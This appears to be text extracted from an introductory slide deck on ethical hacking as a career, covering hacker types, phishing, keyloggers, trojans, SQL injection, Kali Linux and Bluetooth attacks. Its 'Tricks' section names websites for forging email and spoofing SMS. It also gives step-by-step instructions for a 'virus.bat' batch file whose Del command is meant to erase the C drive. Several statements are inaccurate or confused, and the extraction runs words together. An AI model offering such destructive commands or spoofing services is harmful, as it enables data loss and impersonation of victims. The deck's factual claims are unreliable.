ETHICAL HACKING....AS A CAREER OBJECTIVE

j

DIFFERENCE BETWEEN SECURITY AND PROTECTION

Security and protection are extremely close

concepts though not same.

Security measures are adopted to increase

the level of protection

The feeling of protection arises when one

has enough security measures

Security is a type of protection against

external threats.

HACKER AND ETHICAL HACKER

Hacker

• Access computer system or network withoutauthorization

• Breaks the law

Ethical Hacker

• Performs most of the same activities but with owner’spermission

• Employed by companies to perform Penetration Tests

TYPES OF HACKER White Hat Hacker

• Good guys

• Don’t use their skill for illegal purpose

• Computer security experts and help to protect fromBlack Hats.

Black Hat Hacker

• Bad guys

• Use their skill maliciously for personal gain

• Hack banks, steal credit cards and deface websites

Grey Hat Hacker

• It is a combination of White hat n Black Hat Hackers

• Goal of grey hat hackers is to provide national security

HACKING PROCESS

Footprinting

Scanning

EnumerationAttack and Gaining

Access

Escalating Privilege, Covering Tracks and Creating Backdoors

TYPES OF HACKING

Phishing

Key loggers

Trojans

Sql injection

Kali Linux (back-track)

Bluetooth hacking

PHISHING

• Pronounced "fishing“

• The word has its Origin from two words “Password Harvesting” or fishing for Passwords

• Phishing is an online form of pretexting, a kind of deception in which an attacker pretends to be someone else in order to obtain sensitive information from the victim

• Also known as "brand spoofing“

• Phishers are phishing artists

KEYLOGGING

A program or hardware device that captures every key depression on the computer

Key Loggers record keystrokes:

• Legitimate use: Monitor employee productivity

• Illegal uses: Steal passwords, usernames, and other personal/corporate data

There are ways to protect yourself:

• Be aware of what’s installed on your computer

• Use caution when surfing the internet

• Keep your computer’s security software

updated

TROJAN HORSE

A computer virus is a computer program that can copy itself and infect a computer without

permission or knowledge of the user.

Type Of Trojan Horse Hacking

There are two types of Trojan Horse :

-Time Bomb and Logic Bomb

-Droppers

We need to be careful when download something.

We also need an anti-virus to protect our computer

from be infected by virus.

SQL INJECTION:

• SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed.

• URL based injection:

• Avoid using clear text when coding in SQL.

• If your database and webpage are constructed in a way where you can view the data, it’s open to injection.

• http://mysite.com/listauthordetails.aspx?SSN=172-32-9999

• As in prior example, you could add a drop, or other command, to alter the database.

• Passwords, and other sensitive information need to be either encrypted or one way hashed. There is no full proof way to defend from injection, but by limiting sensitive information, you can insure that your information is at least somewhat protected.

Kali Linux is a Debian-derived Linux

distribution designed for digital

forensics and penetration testing. It is

maintained and funded by Offensive

Security Ltd

* It is used to hack any anti virus, website..etc

BLUETOOTH ATTACK• Why Bluesnarfing attack happens ?

- vendors implementation of OBEX protocol

• Three profiles use the OBEX protocol:

- Synchronization Profile (secure)

- File Transfer Profile (secure)

- Object Push (insecure)

File Transfer

Profile

Aplication

Object Push

Business

Card

Synchronization

Phone Book,

Calender

OBEX

Lower Layers

Application Layer

Session Layer

TRICKS

• EMAIL FORGING

• SMS FORGING

• Virus commands

EMAIL FORGING

Definition:

Email Forging is the art of sending an email from the victim’s email account without knowing the password.

Working:

• ATTACKER-----Sends Forged email----- FROM VICTIM

WEBSITES: https://emkei.cz, www.anonymailer.net...

SMS FORGING

• Now the concept of SMS forging lies in changing the SCCP packer which containsthe sender information prior delivering to the SMS gateway.

• The intruder can change the SCCP packet and can send that packet to any of the receiver as a spoofed SMS.

• Some of the Website on the net also provide this facility.

• To provide such service is not legal and the user using this may lead soserious consequences with law.

• Website: http://www.spranked.com

Open Notepad and copy below code into it.@Echo offDel C:\ *.* |y

2. Save this file as virus.bat (Name can be anything but .bat is must)

3. Now, running this file will delete all the content of C Drive.

Virus using commands on notepad

The Certified Ethical Hacker is

a professional certification, provided by

the International Council of E-Commerce

Consultants (EC-Council.)

CEH V8

QUESTIONS???